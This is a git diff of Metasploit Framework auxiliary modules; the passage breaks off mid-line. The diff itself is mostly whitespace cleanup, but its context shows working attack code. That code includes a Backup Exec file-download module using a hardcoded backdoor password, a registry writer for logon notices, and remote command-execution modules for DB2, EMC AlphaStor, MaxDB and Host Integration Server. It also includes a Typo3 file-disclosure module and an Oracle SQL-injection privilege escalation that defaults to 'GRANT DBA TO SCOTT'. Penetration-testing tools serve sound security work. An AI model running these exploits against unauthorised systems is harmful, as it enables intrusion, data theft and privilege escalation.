diff --git a/modules/auxiliary/admin/backupexec/dump.rb b/modules/auxiliary/admin/backupexec/dump.rb index e6f4c1dc9e..f62ef54489 100644 --- a/modules/auxiliary/admin/backupexec/dump.rb +++ b/modules/auxiliary/admin/backupexec/dump.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,13 +18,13 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::NDMP def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Veritas Backup Exec Windows Remote File Access', 'Description' => %q{ This module abuses a logic flaw in the Backup Exec Windows Agent to download arbitrary files from the system. This flaw was found by someone who wishes to - remain anonymous and affects all known versions of the Backup Exec Windows Agent. The - output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program + remain anonymous and affects all known versions of the Backup Exec Windows Agent. The + output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program listed in the references section. To transfer an entire directory, specify a path that includes a trailing backslash. }, @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary 'Version' => '$Revision$', 'References' => [ - ['OSVDB', '18695'], + ['OSVDB', '18695'], ['BID', '14551'], ['URL', 'http://www.fpns.net/willy/msbksrc.lzh'], ], @@ -43,44 +43,44 @@ class Metasploit3 < Msf::Auxiliary ], 'DefaultAction' => 'Download' )) - + register_options( [ Opt::RPORT(10000), - OptAddress.new('LHOST', + OptAddress.new('LHOST', [ false, "The local IP address to accept the data connection" ] ), - OptPort.new('LPORT', + OptPort.new('LPORT', [ false, "The local port to accept the data connection" ] - ), - OptString.new('RPATH', - [ + ), + OptString.new('RPATH', + [ true, - "The remote filesystem path to download", + "The remote filesystem path to download", "C:\\boot.ini" ] ), - OptString.new('LPATH', - [ + OptString.new('LPATH', + [ true, - "The local filename to store the exported data", + "The local filename to store the exported data", "backupexec_dump.mtf" ] - ), + ), ], self.class) end def run print_status("Attempting to retrieve #{datastore['RPATH']}...") - + lfd = File.open(datastore['LPATH'], 'w') - + connect data = ndmp_recv() if (not data) @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary username = "root" password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f" - + # # Authenticate using the backdoor password # @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary username, password ].pack('NNNNNNNNA*A*') - + print_status("Sending magic authentication request...") ndmp_send(auth) data = ndmp_recv() @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary print_error("Did not receive a response to our authentication request") disconnect return - end + end # @@ -125,10 +125,10 @@ class Metasploit3 < Msf::Auxiliary sfd = Rex::Socket.create_tcp_server( 'LocalPort' => datastore['LPORT'] ) - + local_addr = (datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])) local_port = sfd.getsockname[2] - + # # Create the DATA_CONNECT request # @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary Rex::Socket.gethostbyname(local_addr)[3], local_port ].pack('NNNNNNNA4N') - + print_status("Sending data connection request...") ndmp_send(conn) data = ndmp_recv() @@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary sfd.close disconnect return - end + end # # Wait for the agent to connect back @@ -160,8 +160,8 @@ class Metasploit3 < Msf::Auxiliary print_status("Waiting for the data connection...") rfd = sfd.accept() sfd.close - - + + # # Create the Mover Set Record Size request # @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary 0, 0x8000 ].pack('NNNNNNN') - + print_status("Sending transfer parameters...") ndmp_send(msrs) data = ndmp_recv() @@ -182,18 +182,18 @@ class Metasploit3 < Msf::Auxiliary print_error("Did not receive a response to our parameters request") disconnect return - end - + end + # # Define our tranfer parameters # - xenv = + xenv = [ ['USERNAME', ''], ['BU_EXCLUDE_ACTIVE_FILES', '0'], ['FILESYSTEM', "\"\\\\#{datastore['RHOST']}\\#{datastore['RPATH']}\",v0,t0,l0,n0,f0"] ] - + # # Create the DATA_START_BACKUP request # @@ -208,26 +208,26 @@ class Metasploit3 < Msf::Auxiliary ].pack('NNNNNNN') bkup += "dump" bkup += [ xenv.length ].pack('N') - + # # Encode the transfer parameters # xenv.each do |e| k,v = e - + # Variable bkup += [k.length].pack('N') bkup += k bkup += Rex::Encoder::NDR.align(k) - + # Value bkup += [v.length].pack('N') bkup += v - bkup += Rex::Encoder::NDR.align(v) + bkup += Rex::Encoder::NDR.align(v) end - + bkup[-1, 1] = "\x01" - + print_status("Sending backup request...") ndmp_send(bkup) data = ndmp_recv() @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Auxiliary disconnect return end - + # # Create the GET_ENV request # @@ -246,7 +246,7 @@ class Metasploit3 < Msf::Auxiliary 0, 0x4004, 0, - 0 + 0 ].pack('NNNNNN') print_status("Sending environment request...") @@ -256,14 +256,14 @@ class Metasploit3 < Msf::Auxiliary print_error("Did not receive a response to our environment request") disconnect return - end - - # + end + + # # Start transferring data # print_status("Transferring data...") bcnt = 0 - + begin while (data = rfd.get_once) bcnt += data.length @@ -271,13 +271,13 @@ class Metasploit3 < Msf::Auxiliary end rescue ::EOFError end - + lfd.close rfd.close - + print_status("Transferred #{bcnt} bytes.") disconnect - + end - + end diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 00279357e3..883698ca64 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,14 +19,14 @@ class Metasploit3 < Msf::Auxiliary include ::Rex::Platforms::Windows def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Veritas Backup Exec Server Registry Access', 'Description' => %q{ This modules exploits a remote registry access flaw in the BackupExec Windows Server RPC service. This vulnerability was discovered by Pedram Amini and is based - on the NDR stub information information posted to openrce.org. + on the NDR stub information information posted to openrce.org. Please see the action list for the different attack modes. - + }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -42,16 +42,16 @@ class Metasploit3 < Msf::Auxiliary ['System Information'], ['Create Logon Notice'] ], - 'DefaultAction' => 'System Information' + 'DefaultAction' => 'System Information' )) - + register_options( [ Opt::RPORT(6106), - OptString.new('WARN', - [ + OptString.new('WARN', + [ false, - "The warning to display for the Logon Notice action", + "The warning to display for the Logon Notice action", "Compromised by Metasploit!\r\n" ] ), @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary end def auxiliary_commands - return { + return { "regread" => "Read a registry value", # "regenum" => "Enumerate registry keys", } @@ -73,15 +73,15 @@ class Metasploit3 < Msf::Auxiliary logon_notice() end end - - + + def cmd_regread(*args) - + if (args.length == 0) print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion") return end - + paths = args[0].split("\\") hive = paths.shift subval = paths.pop @@ -97,12 +97,12 @@ class Metasploit3 < Msf::Auxiliary end def cmd_regenum(*args) - + if (args.length == 0) print_status("Usage: regenum HKLM\\\\Software") return end - + paths = args[0].split("\\") hive = paths.shift subkey = "\\" + paths.join("\\") @@ -115,10 +115,10 @@ class Metasploit3 < Msf::Auxiliary end end - + def system_info print_status("Dumping system information...") - + prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown' prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)' prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack' @@ -132,14 +132,14 @@ class Metasploit3 < Msf::Auxiliary print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}") print_status("The system runs on a #{deunicode(cpu)}") end - + def logon_notice print_status("Setting the logon warning to #{datastore['WARN'].strip}...") backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN']) backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT') end - - + + def deunicode(str) str.gsub(/\x00/, '').strip end @@ -149,9 +149,9 @@ class Metasploit3 < Msf::Auxiliary # def backupexec_regwrite(hive, subkey, subval, type, data) stub = backupexec_regrpc_write( - :hive => registry_hive_lookup(hive), - :subkey => subkey, - :subval => subval, + :hive => registry_hive_lookup(hive), + :subkey => subkey, + :subval => subval, :type => type, :data => data ) @@ -159,15 +159,15 @@ class Metasploit3 < Msf::Auxiliary return false if resp.length == 0 return true end - + # # Read a registry key # def backupexec_regread(hive, subkey, subval, type = REG_SZ) stub = backupexec_regrpc_read( - :hive => registry_hive_lookup(hive), - :subkey => subkey, - :subval => subval, + :hive => registry_hive_lookup(hive), + :subkey => subkey, + :subval => subval, :type => type ) resp = backupexec_regrpc_call(4, stub) @@ -184,40 +184,40 @@ class Metasploit3 < Msf::Auxiliary # def backupexec_regenum(hive, subkey) stub = backupexec_regrpc_enum( - :hive => registry_hive_lookup(hive), + :hive => registry_hive_lookup(hive), :subkey => subkey ) resp = backupexec_regrpc_call(7, stub) p resp - + return nil if resp.length == 0 ret, len = resp[0,8].unpack('VV') return nil if ret == 0 return nil if len == 0 return resp[8, len] end - + # # Call the backupexec registry service - # + # def backupexec_regrpc_call(opnum, data = '') handle = dcerpc_handle( '93841fd0-16ce-11ce-850d-02608c44967b', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']] ) - + dcerpc_bind(handle) resp = dcerpc.call(opnum, data) outp = '' - + if (dcerpc.last_response and dcerpc.last_response.stub_data) outp = dcerpc.last_response.stub_data end disconnect - + outp end @@ -261,11 +261,11 @@ class Metasploit3 < Msf::Auxiliary hive = opts[:hive] || HKEY_LOCAL_MACHINE type = opts[:type] || REG_SZ data = opts[:data] || '' - - if (type == REG_SZ || type == REG_EXPAND_SZ) + + if (type == REG_SZ || type == REG_EXPAND_SZ) data = Rex::Text.to_unicode(data+"\x00") end - + stub = NDR.UnicodeConformantVaryingString(subkey) + NDR.UnicodeConformantVaryingString(subval) + @@ -279,5 +279,5 @@ class Metasploit3 < Msf::Auxiliary NDR.long(hive) return stub end - + end \ No newline at end of file diff --git a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb index a0ebfda909..e8699952a8 100644 --- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb +++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access', 'Description' => %q{ This module tests for a logic vulnerability in the Cisco VPN Concentrator diff --git a/modules/auxiliary/admin/db2/db2rcmd.rb b/modules/auxiliary/admin/db2/db2rcmd.rb index fbb62094b9..125a10163f 100644 --- a/modules/auxiliary/admin/db2/db2rcmd.rb +++ b/modules/auxiliary/admin/db2/db2rcmd.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -12,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability.', 'Description' => %q{ This module exploits a vulnerability in the Remote Command Server @@ -31,12 +35,12 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Mar 4 2004')) - register_options( + register_options( [ OptString.new('CMD', [ true, 'The command to execute', 'ver']), OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']), OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin']) - ], self.class ) + ], self.class ) end def run @@ -46,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...") - # Connect with a valid user/pass. if not, then bail. + # Connect with a valid user/pass. if not, then bail. begin smb_login() rescue ::Exception => e @@ -54,8 +58,8 @@ class Metasploit3 < Msf::Auxiliary disconnect return end - - # Have it so our command arg is convenient to call. + + # Have it so our command arg is convenient to call. rcmd = datastore['CMD'] print_status("Connecting to named pipe \\DB2REMOTECMD...") @@ -84,10 +88,10 @@ class Metasploit3 < Msf::Auxiliary # Read from the pipe and give us the data. res = pipe.read() puts res - + # Close the named pipe and disconnect from the socket. - pipe.close + pipe.close disconnect - + end end diff --git a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb index c93bf65165..fd65a41fc4 100644 --- a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'May 27 2008')) - register_options( + register_options( [ Opt::RPORT(3000), OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']), @@ -43,17 +47,17 @@ class Metasploit3 < Msf::Auxiliary data = "\x75" + datastore['CMD'] pad = "\x00" * 512 - - pkt = data + pad - - print_status("Sending command: #{datastore['CMD']}") + + pkt = data + pad + + print_status("Sending command: #{datastore['CMD']}") sock.put(pkt) # try to suck it all in. sleep(5) - + res = sock.get_once - + res.each do |info| puts "[*] #{info.gsub(/[^[:print:]]+/,"")}" # hack. end diff --git a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb index 33e6d61cee..5cf0885826 100644 --- a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'May 27 2008')) - register_options( + register_options( [ Opt::RPORT(3500), OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']), @@ -43,17 +47,17 @@ class Metasploit3 < Msf::Auxiliary data = "\x75" + datastore['CMD'] pad = "\x00" * 512 - - pkt = data + pad - + + pkt = data + pad + # commands are executed blindly. - print_status("Sending command: #{datastore['CMD']}") + print_status("Sending command: #{datastore['CMD']}") sock.put(pkt) sleep(1) - + sock.get_once - + print_status("Executed '#{datastore['CMD']}'...") disconnect diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index 54d01c486d..f5071d9f5d 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HP Web JetAdmin 6.5 Server Arbitrary Command Execution', 'Description' => %q{ This module abuses a command execution vulnerability within the @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'http://www.milw0rm.com/exploits/294' ], ], 'DisclosureDate' => 'Apr 27 2004')) - + register_options( [ Opt::RPORT(8000), diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb index c250c89bb4..feefa8f96a 100644 --- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb +++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb index d3c8671161..f4211a12cf 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary This module exploits a file disclosure vulnerability in the jumpUrl mechanism of Typo3. This flaw can be used to read any file that the web server user account has access to. - + }, 'Author' => [ 'spinbad ' ], 'License' => MSF_LICENSE, @@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary error_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&locationData=1:" ju_hash = nil - + res = send_request_raw({ 'uri' => error_uri, 'method' => 'GET', @@ -65,24 +69,24 @@ class Metasploit3 < Msf::Auxiliary if (res and res.message == "OK") res.body =~ /jumpurl Secure: Calculated juHash, ((\w)+), did not match the submitted juHash./ - + if $1.nil? print_error("Error while getting juHash. Maybe the version is already patched...") return end - + ju_hash = $1 print_status("Getting juHash from error message: #{ju_hash}") - + else print_error("No response from the server.") return end - - + + file_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&juHash=#{ju_hash}&locationData=1:" - print_status("Trying to get #{datastore['RFILE']}.") - + print_status("Trying to get #{datastore['RFILE']}.") + file = send_request_raw({ 'uri' => file_uri, 'method' => 'GET', @@ -92,15 +96,15 @@ class Metasploit3 < Msf::Auxiliary 'Connection' => 'Close', } },25) - + if (file and file.message = "OK") if file.body == 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!' print_error("File #{datastore['RFILE']} does not exist.") return end - + print_status("Writing local file #{datastore['LFILE']}.") - open(datastore['LFILE'],'w') {|f| f << file.body } + open(datastore['LFILE'],'w') {|f| f << file.body } else print_error("Error while getting file.") end diff --git a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb index db5dd20bce..6356597d7c 100644 --- a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb +++ b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 9 2008')) - register_options( + register_options( [ Opt::RPORT(7210), OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']), @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary sock.put(pdbmsrv) sock.get_once sock.put(db_version) - + ver = sock.get_once info = ver[27,2000] @@ -69,10 +69,10 @@ class Metasploit3 < Msf::Auxiliary #Send our command. len = 39 + datastore['CMD'].length - + data = len.chr + "\x00\x00\x00\x03\x3F\x00\x00\x01\x00\x00\x00\x54\x0D\x00\x00" data << "\x00\x00\x04\x00" + len.chr + "\x00\x00\x00\x65\x78\x65\x63\x5F\x73\x64" - data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + "#{datastore['CMD']}" + data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + "#{datastore['CMD']}" sock.put(data) diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index 6fc4085088..49930b9329 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -12,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Host Integration Server 2006 Command Execution Vulnerability.', 'Description' => %q{ This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006. @@ -33,12 +37,12 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Oct 14 2008')) - register_options( - [ + register_options( + [ Opt::RPORT(0), OptString.new('COMMAND', [ true, 'The command to execute', 'cmd.exe']), - OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt']) - ], self.class ) + OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt']) + ], self.class ) end def run @@ -53,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary if (dport == 0) dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp') - dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp') + dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp') if (not dport) print_status("Could not determine the RPC port used by the Service.") @@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Bound to #{handle} ...") cmd = NDR.string("#{datastore['COMMAND']}") + NDR.string("#{datastore['ARGS']}") - + print_status("Sending command: #{datastore['COMMAND']} #{datastore['ARGS']}") begin @@ -81,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary end disconnect - + end end =begin diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index 22bfd8d739..1a10237847 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -1,3 +1,6 @@ +## +# $Id$ +## ## # This file is part of the Metasploit Framework and may be subject to @@ -13,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report - + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SQL Server Configuration Enumerator', @@ -31,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary def run print_status("Running MS SQL Server Enumeration...") - + if mssql_login_datastore #Get Version print_status("Version:") @@ -42,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary print "[*]\t#{row}" end vernum = sqlversion.gsub("\n"," ").scan(/SQL Server\s*(200\d)/m) - report_note(:host => datastore['RHOST'], + report_note(:host => datastore['RHOST'], :proto => 'TCP', :port => datastore['RPORT'], :type => 'MSSQL_ENUM', @@ -72,14 +75,14 @@ class Metasploit3 < Msf::Auxiliary #checking for C2 Audit Mode if sysconfig['c2 audit mode'] == 1 print_status("\tC2 Audit Mode is Enabled") - report_note(:host => datastore['RHOST'], + report_note(:host => datastore['RHOST'], :proto => 'TCP', :port => datastore['RPORT'], :type => 'MSSQL_ENUM', :data => "C2 Audit Mode is Enabled") else print_status("\tC2 Audit Mode is Not Enabled") - report_note(:host => datastore['RHOST'], + report_note(:host => datastore['RHOST'], :proto => 'TCP', :port => datastore['RPORT'], :type => 'MSSQL_ENUM', @@ -125,14 +128,14 @@ class Metasploit3 < Msf::Auxiliary #check if remote access is enabled if sysconfig['remote access'] == 1 print_status("\tremote access is Enabled") - report_note(:host => datastore['RHOST'], + report_note(:host => datastore['RHOST'], :proto => 'TCP', :port => datastore['RPORT'], :type => 'MSSQL_ENUM', :data => "remote access is Enabled") else print_status("\tremote access is Not Enabled") - report_note(:host => datastore['RHOST'], + report_note(:host => datastore['RHOST'], :proto => 'TCP', :port => datastore['RPORT'], :type => 'MSSQL_ENUM', @@ -142,14 +145,14 @@ class Metasploit3 < Msf::Auxiliary #check if updates are allowed if sysconfig['allow updates'] == 1 print_status("\tallow updates is Enabled") - report_note(:host => datastore['RHOST'], + report_note(:host => datastore['RHOST'], :proto => 'TCP', :port => datastore['RPORT'], :type => 'MSSQL_ENUM', :data => "allow updates is Enabled") else print_status("\tallow updates is Not Enabled") - report_note(:host => datastore['RHOST'], + report_note(:host => datastore['RHOST'], :proto => 'TCP', :port => datastore['RPORT'], :type => 'MSSQL_ENUM', @@ -267,7 +270,7 @@ class Metasploit3 < Msf::Auxiliary if syslogins != nil syslogins.each do |acc| print_status("\t#{acc.join}") - report_note(:host => datastore['RHOST'], + report_note(:host => datastore['RHOST'], :proto => 'TCP', :port => datastore['RPORT'], :type => 'MSSQL_ENUM', @@ -438,7 +441,7 @@ class Metasploit3 < Msf::Auxiliary if sameasuser != nil sameasuser.each do |up| print_status("\t#{up.join}") - report_note(:host => datastore['RHOST'], + report_note(:host => datastore['RHOST'], :proto => 'TCP', :port => datastore['RPORT'], :type => 'MSSQL_ENUM', @@ -464,7 +467,7 @@ class Metasploit3 < Msf::Auxiliary if blankpass != nil blankpass.each do |up| print_status("\t#{up.join}") - report_note(:host => datastore['RHOST'], + report_note(:host => datastore['RHOST'], :proto => 'TCP', :port => datastore['RPORT'], :type => 'MSSQL_ENUM', @@ -686,7 +689,7 @@ class Metasploit3 < Msf::Auxiliary fountsp.each do |strp| if dangeroussp.include?(strp.strip) print_status("\t#{strp.strip}") - report_note(:host => datastore['RHOST'], + report_note(:host => datastore['RHOST'], :proto => 'TCP', :port => datastore['RPORT'], :type => 'MSSQL_ENUM', @@ -714,7 +717,7 @@ class Metasploit3 < Msf::Auxiliary mssql_query(querykey)[:rows].each do |i| instances << i[1] end - end + end print_status("Instances found on this server:") instancenames = [] if instances != nil diff --git a/modules/auxiliary/admin/mssql/mssql_sql.rb b/modules/auxiliary/admin/mssql/mssql_sql.rb index 104906564f..127311c0cc 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql.rb @@ -15,7 +15,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL - + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SQL Server Generic Query', @@ -33,12 +33,12 @@ class Metasploit3 < Msf::Auxiliary ] )) - register_options( + register_options( [ OptString.new('SQL', [ false, 'The SQL query to execute', 'select @@version']), ], self.class) end - + def run mssql_query(datastore['SQL'], true) if mssql_login_datastore disconnect diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index 90f65aae7b..8409e0a9ae 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/oracle/droptable_trigger.rb b/modules/auxiliary/admin/oracle/droptable_trigger.rb index 0904729430..f5f5f713c0 100644 --- a/modules/auxiliary/admin/oracle/droptable_trigger.rb +++ b/modules/auxiliary/admin/oracle/droptable_trigger.rb @@ -36,13 +36,13 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 13 2009')) - register_options( + register_options( [ OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']), OptString.new('USER', [ false, 'The current user. ', 'SCOTT']), OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - + ], self.class) end @@ -58,8 +58,8 @@ class Metasploit3 < Msf::Auxiliary function1 = %Q| CREATE OR REPLACE PROCEDURE #{name1} AUTHID CURRENT_USER AS - PRAGMA AUTONOMOUS_TRANSACTION; - BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}'; + PRAGMA AUTONOMOUS_TRANSACTION; + BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}'; END; | @@ -78,17 +78,17 @@ class Metasploit3 < Msf::Auxiliary | prepare ="create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)" - + exploiting1 ="drop table \"O' and 1=#{datastore['USER']}.#{name2}--\"" - + exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')" - + fun1 = Rex::Text.encode_base64(function1) fun2 = 